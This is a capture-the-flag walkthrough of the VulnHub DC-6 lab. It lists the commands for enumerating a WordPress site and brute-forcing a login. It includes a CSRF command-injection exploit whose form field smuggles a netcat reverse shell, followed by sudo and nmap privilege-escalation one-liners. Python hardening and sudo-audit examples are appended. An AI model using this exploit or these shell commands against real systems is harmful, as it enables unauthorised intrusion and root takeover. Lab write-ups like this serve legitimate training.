CTF Walk Through | HackProof Academy



06/12/2024 | Shad Hussain | Views 160 | Comments 0
CTF Walk Through - DC6 - VulnHub

Machine Link: https://www.vulnhub.com/entry/dc-6,315/

STEP 1
    arp-scan -l
FINDING
    192.168.31.132
---------------------------------------------------------------------------------------------------------------
STEP 2
    nmap 192.168.31.132 -p- -Pn -A -T4 -sSV
FINDING
    22/tcp open ssh   OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
    80/tcp open http  Apache httpd 2.4.25 ((Debian))
---------------------------------------------------------------------------------------------------------------
STEP 3
    nano /etc/hosts
    192.168.31.132 wordy
    ctrl+x ctrl+y enter
---------------------------------------------------------------------------------------------------------------
STEP 4
    wpscan --url http://wordy -e at -e ap -e u
FINDING
    User(s) Identified: admin, mark, graham, sarah, jens
---------------------------------------------------------------------------------------------------------------
STEP 5
    dirb http://wordy
FINDING
    + http://wordy/wp-admin/admin.php (CODE:302|SIZE:0)
---------------------------------------------------------------------------------------------------------------
STEP 6
HINT IN THE DC-6 VULNHUB PAGE
    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
    wpscan --url http://wordy/wp-login.php -U /root/Desktop/dc5users.txt -P /root/Desktop/passwords.txt
FINDING
    | Username: mark, Password: helpdesk01
---------------------------------------------------------------------------------------------------------------
STEP 7
    http://wordy/wp-admin/admin.php
    Username: mark, Password: helpdesk01
On the left menu you will get Activity Monitor.
    searchsploit activity monitor
FINDING
    Activity Monitor 2002 2.6 - Remote Denial of Service                                  | windows/dos/22690.c
    RedHat Linux 6.0/6.1/6.2 - pam_console Monitor Activity After Logout                  | linux/local/19900.c
    WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injec  | php/webapps/45274.html
    WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (  | php/webapps/50110.py
---------------------------------------------------------------------------------------------------------------
STEP 7 (cont.)
    https://www.exploit-db.com/exploits/45274
    wget https://www.exploit-db.com/download/45274
Make some changes in the CSRF exploit, saved as html:
    <html>
    <!--
    Wordpress Plainview Activity Monitor RCE
    [+] Version: 20161228 and possibly prior
    [+] Description: Combine OS Commanding and CSRF to get reverse shell
    [+] Author: Lydéric LEFEBVRE
    [+] CVE-ID: CVE-2018-15877
    [+] Usage: Replace 127.0.0.1 & 9999 with your ip and port to get reverse shell
    [+] Note: Many reflected XSS exist on this plugin and can be combined with this exploit as well
    -->
    <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="google.fr| nc 192.168.31.28 9999 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
---------------------------------------------------------------------------------------------------------------
STEP 8
On a new terminal:
    nc -nvlp 9999
Open the html exploit and press the button; you get the reverse connection.
---------------------------------------------------------------------------------------------------------------
STEP 9
    python -c 'import pty; pty.spawn("/bin/bash")'
    cd /home/mark/stuff
    ls -la
    cat things-to-do.txt
FINDING
    - Add new user: graham - GSo7isUM1D4 - done
We got graham's password.
    su graham
    GSo7isUM1D4
---------------------------------------------------------------------------------------------------------------
STEP 10
    sudo -l
FINDING
    (jens) NOPASSWD: /home/jens/backups.sh
---------------------------------------------------------------------------------------------------------------
STEP 11
    echo "/bin/bash" > /home/jens/backups.sh
    sudo -u jens /home/jens/backups.sh
    sudo -l
FINDING
    (root) NOPASSWD: /usr/bin/nmap
    echo 'os.execute("/bin/sh")' > /tmp/root.nse
    sudo nmap --script=/tmp/root.nse
    whoami
    root
    cd /root
    ls -la
    cat theflag.txt
[ASCII-art banner from theflag.txt omitted; it ends with:]
    Congratulations!!!
---------------------------------------------------------------------------------------------------------------
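The injection used in Step 7 works because the plugin hands the `ip` field to a shell, so a `|` in the value starts a second command. The following is an added example, not code from the page or from the Plainview plugin, and it is in Python rather than the plugin's PHP: it places the weak pattern (input spliced into a shell string) beside an allow-list check that accepts only an IP address or an RFC 1123 hostname and then builds an argv list, so no shell ever parses the value. The function names, the `dig` command and the sample inputs are assumptions constructed for the example.

```python
import ipaddress
import re
import subprocess
from typing import List

# Constructed inputs: a benign lookup target and the value injected in Step 7.
BENIGN_TARGET = "google.fr"
INJECTED_TARGET = "google.fr| nc 192.168.31.28 9999 -e /bin/bash"

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, at most 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?=.{{1,253}}$)(?:{_LABEL}\.)*{_LABEL}$")


def vulnerable_lookup_command(target: str) -> str:
    """The weak pattern behind the Step 7 injection: the user-supplied target
    is spliced into a shell command line, so '|' and ';' start new commands.
    Returned as a string for inspection only; it is never executed here."""
    return "dig +short " + target


def is_valid_target(target: str) -> bool:
    """Allow-list check: accept an IP address or an RFC 1123 hostname only."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(target) is not None


def safe_lookup_argv(target: str) -> List[str]:
    """Hardened form: validate, then build an argv list. With a list and
    shell=False the value reaches the tool as one argument, never a shell."""
    if not is_valid_target(target):
        raise ValueError(f"rejected lookup target: {target!r}")
    return ["dig", "+short", target]   # 'dig' is an assumed lookup tool


def run_lookup(target: str, timeout: float = 5.0) -> str:
    """Execute the hardened lookup (needs dig on PATH; not exercised offline)."""
    proc = subprocess.run(safe_lookup_argv(target), shell=False,
                          capture_output=True, text=True, timeout=timeout)
    return proc.stdout.strip()


def suspicious_targets(submitted: List[str]) -> List[str]:
    """Log-review helper: return submitted values that fail the allow-list,
    which is the signal to alert on for attempts against the lookup form."""
    return [v for v in submitted if not is_valid_target(v)]


if __name__ == "__main__":
    print("vulnerable:", vulnerable_lookup_command(INJECTED_TARGET))
    print("hardened  :", safe_lookup_argv(BENIGN_TARGET))
    print("flagged   :", suspicious_targets([BENIGN_TARGET, INJECTED_TARGET]))
```

The allow-list is deliberately stricter than "strip metacharacters": rejecting everything that is not a hostname or address leaves nothing for a shell to interpret, and the same check doubles as a detector when run over submitted form values.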

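Steps 10 and 11 turn two sudo rules into root: a NOPASSWD script that the calling user can overwrite, and NOPASSWD nmap, whose --script option runs caller-supplied Lua. The audit script below is an added example, not from the page or the DC-6 image: it parses `sudo -l` output and flags both patterns. The SAMPLE_SUDO_L text is constructed to mirror the walkthrough, the SHELL_CAPABLE list is an assumption, and the `is_writable` hook exists so the check can be exercised offline (the default implementation stats the real file).

```python
import os
import re
import stat
from typing import Callable, List, Tuple

# Constructed sample in the shape of `sudo -l` output, mirroring Steps 10 and 11.
SAMPLE_SUDO_L = """\
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/id
"""

# Assumed list of binaries whose ordinary options execute caller-chosen code
# (nmap --script runs NSE Lua; the rest offer shell escapes or interpreters).
SHELL_CAPABLE = {"nmap", "vim", "vi", "less", "more", "find", "awk",
                 "perl", "python", "python3", "bash", "sh", "env"}

# One rule line: "(runas) [NOPASSWD:] command [args]"
_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<nopasswd>NOPASSWD:\s*)?(?P<cmd>\S.*?)\s*$")

Rule = Tuple[str, bool, str]       # (run-as user, passwordless, command)
Finding = Tuple[str, str, str]     # (run-as user, target, reason)


def parse_sudo_l(text: str) -> List[Rule]:
    """Extract (runas, nopasswd, command) from each rule line of `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = _RULE_RE.match(line)
        if m:
            rules.append((m["runas"].strip(), m["nopasswd"] is not None, m["cmd"]))
    return rules


def default_is_writable(path: str) -> bool:
    """Live-host check: can the current user, or any group/other, write the target?"""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return os.access(path, os.W_OK) or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudo_rules(text: str,
                     is_writable: Callable[[str], bool] = default_is_writable) -> List[Finding]:
    """Flag rules that let the caller run code of their choosing as the run-as user."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        target = cmd.split()[0]
        auth = "without a password" if nopasswd else "with the caller's password"
        if target == "ALL":
            findings.append((runas, target, f"unrestricted command set {auth}"))
            continue
        base = os.path.basename(target)
        if base in SHELL_CAPABLE:
            findings.append((runas, target, f"{base} can execute caller-chosen code {auth}"))
        if is_writable(target):
            findings.append((runas, target,
                             f"target is writable by the caller, so its contents can be replaced {auth}"))
    return findings


if __name__ == "__main__":
    # Offline demo: treat the backup script as writable, as it was in the walkthrough.
    for finding in audit_sudo_rules(SAMPLE_SUDO_L, lambda p: p == "/home/jens/backups.sh"):
        print(finding)
```

The fix on the host side is the mirror image of each finding: make any script named in sudoers owned by root and writable only by root, and avoid NOPASSWD rules for binaries that take a script or interpreter argument.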
© mutebreak.com | All Rights Reserved